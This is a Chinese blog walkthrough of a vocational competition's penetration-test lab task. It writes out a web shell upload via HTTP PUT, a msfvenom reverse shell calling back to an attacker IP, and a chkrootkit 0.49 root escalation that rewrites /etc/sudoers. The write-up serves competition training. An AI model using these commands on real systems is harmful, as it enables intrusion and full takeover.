2023年武汉市中等职业教育网络安全赛项竞赛试题——综合靶机渗透测试解析教程

任务一:综合靶机渗透测试

任务环境说明:

服务器场景:ZHCS-2(关闭连接)

服务器场景操作系统:版本不详
大家需要靶机环境可以私信我获取

1.扫描目标靶机将靶机开放的所有端口,当作flag提交(例:21,22,23)

FLAG:22,80

2.扫描目标靶机将靶机的http服务版本信息当作flag提交(例:apache 2.3.4)

FLAG: lighttpd 1.4.28

3.靶机网站存在目录遍历漏洞,请将html页面中的倒数第二行中的name当作flag提交

FLAG: Parent Directory

4.使用kali对目标靶机进行渗透测试,将目标内核版本当作flag值提交

使用put方法发现可以上传

于是我们可以直接使用PUT方法上传一句话木马

然后使用中国菜刀连接shell

连接成功如下图:

接下来根据题目,我们可以打开虚拟终端来查看系统内核版本信息

FLAG:Ubuntu 12.04.4 LTS

5.该靶机存在提权漏洞,请将存在提权漏洞的程序名当作flag值提交

使用msfvenom生成攻击载荷模块

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.94.156 lport=443 R >php_shell.php

然后使用msf进行监听

点击执行所上传的脚本 ,成功反弹shell

成功返回shell,然后我们这里用python打开一个标准的shell

python -c 'import pty;pty.spawn("/bin/bash")'

Whoami;pwd;uname -a查看以下系统的全部信息

我们可以使用 ls -la /etc/cron*查看文件

#crontab 是用来让使用者在固定时间或固定间隔执行程序之用,换句话说,也就是类似使用者的时程表

在/etc/cron.dayly目录下,发现chkrootkit工具,然后我们查看一下chkrootkit的版本

FLAG:chkrootkit version 0.49或者chkrootkit-0.49

6.在kali中搜索该提权漏洞,并将漏洞的披露时间当作flag值提交.(例:2023-05-26)

根据上一题的漏洞名称,我们返回kali搜索相关的漏洞披露时间

FLAG:2014-06-04

7.root家目录下存在一个***.txt文件,文件名+文件内容当作flag提交,用+号连接(例:***.txt+qwoingqwoighoqisfhoasf)

然后根据以上题目,我们需要提权到root权限

提权步骤:

1.在/ tmp中放入一个名为'update'的非root所有者的可执行文件。

2以root身份运行chkrootkit,其文件/ tmp /update将以root身份执行。

如果攻击者知道管理员是定期运行chkrootkit(通过查看cron.daily获知),并且对/tmp(没有挂载noexec)有写访问权限,就可以利用该漏洞获取root权限。

(1)在/tmp目录下创建update文件,并赋予可执行权限

Touch update

Chmod +x update

(2)、向update文件中写入将www-date添加到sudo组的命令

echo 'chmod +w /etc/sudoer && echo "www-data ALL=(ALL) NOPASSWD:ALL" > /etc/sudoers' > /tmp/update

(3)、查看当前用户可执行的sudo文件

(4)、sudo进行提权,成功提权

然后根据题目,我们进入家目录下面查看文件

文件名:7d03aaa2bf93d80040f3f22ec6ad9d5a.txt

文件内容:ease to struggle and you cease to live.
FLAG:7d03aaa2bf93d80040f3f22ec6ad9d5a.txt+ease to struggle and you cease to live.

Powered by 旺仔Sec

博客链接:https://blog.csdn.net/qq_50377269?spm=1010.2135.3001.5343

相关推荐
广东帝工智能安防14 分钟前
智能设防精准预警,筑牢内河桥梁通航安全防护网
安全·桥梁防撞·智慧航道·防撞预警系统
kali-Myon2 小时前
某校园门禁系统高危 SQL 注入漏洞挖掘复盘
数据库·sql·安全·web安全
志栋智能2 小时前
超自动化安全中的威胁狩猎
运维·安全·自动化
lularible4 小时前
HSM技术精讲(3.8):证书对象——数字世界的“身份证明“
安全·开源·嵌入式·汽车电子·hsm
德迅--文琪6 小时前
筑牢主机安全最后一公里,德迅卫士构建全维度智能防护屏障
安全
+wacyltd大模型备案算法备案6 小时前
大模型评估测试题库怎么建?风险分类、测试样本的完整方法
人工智能·算法·安全·分类·大模型·大模型备案·大模型上线登记
网络研究院7 小时前
Brave浏览器放大招引入容器功能,实现多账户安全隔离
网络·安全·容器·浏览器·数据·隐私
志栋智能9 小时前
超自动化安全如何优化安全运营成本?
人工智能·安全·自动化
jieyucx9 小时前
【系统安全铁律】解密 Linux 权限三色数字密码:chmod 最小化赋权与生产环境避坑指南
linux·安全·系统安全·权限·chmod·777
xiaohaiAIgeo10 小时前
【2026年】生物安全实验室P2/P3通风系统设计要点与合规要求
安全·科普知识